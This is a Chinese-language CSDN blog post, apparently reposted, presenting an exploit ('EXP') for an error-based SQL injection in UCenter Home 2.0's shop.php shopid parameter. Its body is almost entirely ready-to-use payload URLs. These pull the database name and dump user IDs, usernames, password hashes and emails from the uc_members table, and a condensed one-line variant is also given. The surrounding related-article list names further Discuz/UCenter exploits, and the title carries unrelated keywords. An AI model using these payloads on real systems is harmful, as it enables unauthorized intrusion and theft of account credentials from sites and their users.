mysql 触发器 lod_UCenter Home 2.0 SQL注入漏洞

最新推荐文章于 2024-04-26 16:45:00 发布
最新推荐文章于 2024-04-26 16:45:00 发布
阅读量186 收藏
点赞数
文章标签: mysql 触发器 lod
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30832021/article/details/114812406
版权

EXP:

1,得到数据库名称

http://server/shop.php?ac=view&shopid=253

and(select 1 from(select count(*),concat((select (select

concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from

information_schema.tables group by x)a) and 1=1

a4c26d1e5885305701be709a3d33442f.png

红色部分要在下面的语句中替换。

2,注入得到帐户密码信息

http://server/shop.php?ac=view&shopid=253

and(select 1 from(select count(*),concat((select (select (SELECT

concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email)

as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from

information_schema.tables group by x)a) and 1=1

a4c26d1e5885305701be709a3d33442f.png

上面要两句,比较麻烦,其实一句也可以搞定

and(select 1 from(select count(*),concat((select (select (SELECT

concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email)

as char),0x27,0x7e) FROM uc_members LIMIT 0,1) ) from

information_schema.tables limit 0,1),floor(rand(0)*2))x from

information_schema.tables group by x)a) and 1=1

直接这一句就行了,不要database

青涩Pure
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
北京亚鸿世纪互联网信息安全综合管理系统ucenter命令执行
weixin_43567873的博客
03-07 55
北京亚鸿世纪互联网信息安全综合管理系统ucenter命令执行
Ucenter Home SQL注入漏洞详细分析(需要GPC=OFF)
收集盒 Book box
05-16 1792
SQL Injection 1: 漏洞在文件\source\cp_profile.php <?php // .......省略....... //性别 $_POST['sex'] = intval($_POST['sex']); if($_POST['sex'] && empty($s
Discuz7.X通杀0day(UCenter Home-2.0) poc
收集盒 Book box
09-12 933
作者: inj3ct0r 漏洞文件 : Shop.php 漏洞表现: ?ac=view&shopid= 漏洞类型 : SQL Injection (MySQL Error Based) 利用POC: 1、查询出UC_HOME的DATABSE: and (select 1 from(select count(*),concat((select (select concat(0x7
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
weixin_72543266的博客
04-22 1235
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
discuz api uc.php 漏洞,解读Discuz论坛程序中UCenter致命性UC_KEY漏洞
weixin_36146811的博客
03-18 998
Discuz早已是朋友家喻户晓的程序了,几乎所有玩过论坛的朋友都或多或少知道它,但也因为这么大的平台(腾讯旗下品牌)也有着很严重的安全漏洞。所以以下图为例为大家展示一下!希望能够对大家有所帮助!Kiscu!是知名的开源论坛建站程序,在国内有着庞大的用户群体,一旦发生安全漏洞,做网站受影响网站将不计其数。有白帽发现Kiscuz!程序存在一个安全bug,在得知UC_KEY的情况下,可以轻松向站点写入后...
漏洞复现-DiscuzX 系列全版本后台SQL注入漏洞
qq_59350385的博客
05-10 1516
目录 环境搭建 (1)源码下载: 漏洞检测 报错注入 写文件 漏洞分析 环境搭建 (1)源码下载: https://search.gitee.com/?skin=rec&type=repository&q=discuz git clonehttp://htts://gite.com/ComsenzDiscuzX.git 放置于web根目录,访问即可进入安装页面 (2)也可搭建vulhub靶场,启动discuz环境 漏洞检测 http://.....
Yukon.rar_LOD_Opengl Lod_Yukon_Yukon lod
09-23
《OpenGL LOD技术在Yukon项目中的应用》 在计算机图形学领域,Level of Detail(LOD)技术是一种优化3D场景渲染效率的重要手段。它通过动态调整模型的细节程度来适应不同距离或视角下的显示需求,从而节省计算资源...
openGL_test.rar_LOD_Opengl Lod_visual c
09-23
OpenGL测试项目 - LOD与OpenGL LOD在Visual C++中的实现 OpenGL(Open Graphics Library)是一种用于渲染2D和3D图形的应用程序编程接口(API),它为程序员提供了在各种操作系统上创建交互式图形的强大工具。LOD...
LOD.rar_LOD_LOD算法_algorithm
09-23
**LOD(Level of Detail)算法详解** LOD(Level of Detail)算法是计算机图形学中的一个重要技术,尤其在3D场景渲染、游戏开发和虚拟现实应用中扮演着至关重要的角色。该算法的核心思想是为了优化资源消耗,提高...
chunkdemo-2002-08-06.zip_9393Chu. com_LOD_LOD Terrain_chunked_te
09-19
《OpenGL与分块LOD地形渲染技术详解》 在3D图形编程中,尤其是在游戏开发领域,高效地渲染大规模地形是至关重要的。本篇将详细探讨如何利用OpenGL和分块LOD(Level of Detail)技术来实现这一目标。标题中的...
LOD.rar_LOD_dirext_四叉树 lod 地形_四叉树 地形_LOD地形
09-24
LOD技术在地形渲染中的应用与四叉树解析》 LOD,即Level of Detail(细节层次),是一种在3D图形渲染中广泛使用的优化技术,用于动态调整场景中的对象细节,以达到在保持视觉质量的同时减少计算量,提高渲染效率...
UCenter_1.6.0最新版本
03-07
UCenter_1.6.0最新版本 utf-8编码
关于Discuz! X系列远程代码执行漏洞
weixin_34306676的博客
11-16 510
一、漏洞起源 突然有同事反馈,无法注册   看到这里不了解的同行估计一年懵逼,这里也是常用的漏洞攻击,可以肯定的是  badwords.php文件被修改了 ,可以查看这个文件内容 &lt;?php $_CACHE['badwords'] = array ( 'findpattern' =&gt; array ( 'balabala' =&gt; '/.*/...
MKcms漏洞合集
最新发布
2301_80115097的博客
04-26 600
MKCMS5.0是一款基于PHP+MYSQL开发制作的专业全自动采集电影网站源码。程序不需授权上传直接使用,自动更新电影,无人值守!完整的会员影视中心 后台可对接卡盟 可以设置收费观看模式。下载地址:链接:https://pan.baidu.com/s/12HsPtKN8ECIAv3QNy6rSwg提取码:zkaq源码放在phpstudy根目录下。访问:http://127.0.0.1/MKCMS5.0/install/
discuz7.2sql注入漏洞
weixin_40709439的博客
09-20 8295
今天尝试了discuz7.2动力论坛的sql注入漏洞 原因是由faq.php文件源码存在漏洞引起的 下载官方discuz7.2源码,在本地搭建漏洞环境 http://www.comsenz.com/downloads/install/discuz 下载的三个文件 利用http://localhost:8088/discuz72/upload/install/index.php进行安装...
uc_home 中点击消息出错
帅傻了
01-11 692
在ucenter的表中创建  uc_pms表即可 表结构 -- 表的结构 `uc_pms` -- CREATE TABLE IF NOT EXISTS `uc_pms` (             //表前缀根据安装时候设定的前缀名进行修改 `pmid` int(10) unsigned NOT NULL AUTO_INCREMENT, `msgfrom` varcha
Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破
热门推荐
weixin_40966980的博客
01-03 2万+
这里有个验证码的地址,为:http://localhost/uc_server/admin.php?m=seccode&seccodeauth=07d4kVIZ%2Fj5pecd%2Bv7%2FuE0zfvj%2FKRIrF3pmAd%2BupYhm4GT4&1104676922 验证码一直是 cccc 应该是每个ip第一次访问的话都是这个,所以可以用来爆破
sqlloader使用
weixin_33670713的博客
08-19 124
2010年8月19日 17:40:37  今天看了申请了*loader的使用,自己小试了下,记录在这1、假设要插入数据的表ftest,字段是(id,username,password,sj)2、导入表的数据 以txt格式存储,名为data.txt 1 f f 2010-8-192 f1 f1 2010-8-193 f2 f2 2010-8-194 f3 f3 2010-8-195 f4 f4 20...
什么事是lod2.0模型
05-28
LOD2.0(Level of Detail 2.0)是城市级三维模型的一种等级,通常也称为“中等精度”模型或“半精细”模型。它在三维模型的细节和精度方面介于LOD1.0和LOD3.0之间。 与LOD1.0模型相比,LOD2.0模型包含更多的细节和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值